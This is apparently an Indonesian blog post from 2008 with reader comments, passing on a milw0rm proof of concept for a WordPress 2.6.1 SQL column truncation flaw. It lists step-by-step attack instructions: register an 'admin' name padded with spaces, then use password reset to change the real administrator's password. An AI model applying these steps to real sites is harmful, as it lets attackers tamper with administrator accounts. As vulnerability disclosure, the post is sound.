internet,komputer,bisnis,lagu,software,download,program,gratis,free,video,laptop,jualan,facebook,aplikasi,antivirus,kuliah,matakuliah,module,linux,windows,tutorial,tips,handphone,portable,hardware








Beware Of WP Registration 2.6.1

Posted on September 8th, 2008 by celoteh

wordpress-logo copy Baru kemaren mendapatkan informasi tentang bugs Google Chrome. Hari ini mas Tono memberikan Informasi lagi mengenai WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC), yang dia dapatkan dari rss Milw0rm, memang agak telat informasi ini setidaknya baru sehari yang lalu informasi ini di publikasikan di Milw0rm.

Isi dari informasi tersebut adalah adanya celah yang bisa mengganti password admin. Jika Form Registrasi pada WordPress Enable atau diaktifkan. Berikut ini adalah cara yang didapatkan oleh “mereka” untuk mengganti password admin :

1. go to url: server.com/wp-login.php?action=register
2. register as:
login: admin[55 space chars]x
email: your email
now, we have duplicated 'admin' account in database
3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into field and submit this form
5. check your email and go to reset confirmation link
6. admin's password changed, but new password will
   be send to correct admin email
# milw0rm.com [2008-09-07]

Filed under: Uncategorized |




18 Comments

  1. danu ~ Sep 8, 2008 at 5:14 pm

    mantap tipsnya nih

    danus last blog post..Alexa Rank Update

  2. afwan auliyar ~ Sep 9, 2008 at 6:27 am

    wew…. ngeri juga yak …..

    akhirnya saya disable aja dech form registrasinya … :)

    tp klo updaet yg baru, bete juga

    afwan auliyars last blog post..Review Tulisan berkarakter ……

  3. ichanx ~ Sep 9, 2008 at 9:26 am

    untung situs2 gw gak ada yng dibuka form registrasinya… padahal ada 2 biji yang make wordpress 2.6.1 hehehe

    ichanxs last blog post..Rokok Diambang Kepunahan

  4. trendy ~ Sep 9, 2008 at 9:44 am

    bisa2 aja ya!
    wekekekkeekke!

    trendys last blog post..Telepon Umum!

  5. ruben ~ Sep 9, 2008 at 10:12 am

    wah… harus buru2 non aktifkan form register nih…

    rubens last blog post..Metallica’s New Album Release on September

  6. hrxone ~ Sep 9, 2008 at 10:12 am

    hmm…wp 2.6.1 yah? btw kok kayaknya emang banyak bugsnya yah? :(

    hrxones last blog post..Adsense Method

  7. Adieska ~ Sep 9, 2008 at 3:45 pm

    Aku belum apgred ke WP 2.6.1. Masih 2.6 aja. Jadi nggak berani mo apgred neh. Thanks infonya ya bro… :)

    Adieskas last blog post..Untung Ada Google Reader

  8. hanif ~ Sep 11, 2008 at 9:33 am

    pake WPMU 2.6.1 nih, sama ga ya?

  9. bozz ~ Sep 11, 2008 at 12:46 pm

    makanya saya ga mau pake google chrome soalnya masih beta version, ntar kl dah ga beta mungkin mau pake…

  10. orangndut ~ Sep 11, 2008 at 3:49 pm

    Pertama: Saya pake blogger sie, jadi tenang…hehehe

    Kedua: just info broth, dapet award dari OrangNdut :)

  11. heddy ~ Sep 12, 2008 at 4:26 pm

    @ danu :thanks bro if this usefull..

    @ afwan auliyar : iya mas mending disable saja registrationya..

    @ ichanx : wah banyak juga sitenya mas ichanx inih…

    @ trendy : ihihihih

    @ ruben : iya brurrr…

    @ hrxone : iya nih…

    @ adieska : sama-sama bro..

    @ hanif : wah itu saya gak tau bro..

    @ bozz : iya namanya aja masih beta mas..

    @ orangndut : hahahhahaha…ok thanks mas awardnya..

  12. Edi Psw ~ Sep 13, 2008 at 5:08 am

    Wah, repot kalau begitu.
    Padahal security itu penting.

    Edi Psws last blog post..Blog Ini Meraih 2 Award

  13. kapanpun.com ~ Sep 13, 2008 at 12:27 pm

    bahaya juga ya bug tersebut, bisa buat hack jigana mah

  14. manggis ~ Sep 16, 2008 at 2:50 pm

    Klo pake blogspot…ribet gitu juga…?

    manggiss last blog post..PRAHARA DI AWAL RHAMADAN….

  15. zeze ~ Sep 16, 2008 at 6:46 pm

    saya dah update 2.6.2 makin banyak bug nya :(

    zezes last blog post..O2 MusicPlayer S60v2

  16. Ngintip Friendster 404 | hatetepe titik dua garing dua kali celoteh dot info ~ Sep 25, 2008 at 12:34 am

    [...] lewat browser.. yah pokoknya banyak banget dah cemacem caranya, sampai 10 hari lebih gak apdet ini blog ku.. hikz..hikz..hikz.. Sukurlah Sudah berakhir sudah intip-FS ini, jadi saya bisa fokus lagi kejalan [...]

  17. heddy ~ Oct 25, 2008 at 7:33 pm

    @ edi psw : iya mas..bener..security is first

    @ kapanpun.com : iya mas..urang bener…

    @ manggis : kalau pake blogspot gak tau saya mas..sepertinya nggak deh..wong yang punya si embah google

    @ zeze : iya mas semakin banyak bugnya…

  18. Ngintip Friendster 404 | Kampanye Damai Pemilu Indonesia 2009 ~ May 23, 2009 at 3:34 pm

    [...] lewat browser.. yah pokoknya banyak banget dah cemacem caranya, sampai 10 hari lebih gak apdet ini blog ku.. hikz..hikz..hikz.. Sukurlah Sudah berakhir sudah intip-FS ini, jadi saya bisa fokus lagi kejalan [...]

Discussion | Share Feedback




CommentLuv Enabled
« »